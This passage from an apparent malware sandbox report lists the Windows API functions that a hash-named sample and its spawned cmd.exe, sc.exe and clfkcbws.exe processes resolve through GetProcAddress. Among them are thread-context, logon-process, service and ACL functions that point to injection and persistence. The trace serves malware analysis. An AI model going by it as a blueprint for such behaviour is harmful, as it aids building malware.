parameter GetSystemTime (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetUserNameA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CheckTokenMembership (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter ShellExecuteA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter ShellExecuteExW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter atexit (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetSystemWow64DirectoryA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter _allmul (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SHGetInstanceExplorer (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter EventUnregister (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter EventEnabled (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockShared (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockShared (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter InitCommonControlsEx (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SetEntriesInAclW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetMartaExtensionInterface (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsA (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter PathCreateFromUrlW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00004536)\n \"308041c7ec841b30a3e2bc6faaf475372a6306962af84cf26424656d52dca739.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004536)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000884)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00000884)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00000884)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00000884)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004688)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter CopyFileExW (UID: 00000000-00004688)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter IsDebuggerPresent (UID: 00000000-00004688)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter SetConsoleInputExeNameW (UID: 00000000-00004688)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004688)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002348)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002348)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004540)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004540)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000176)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00000176)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005112)\n \"clfkcbws.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005112)\n 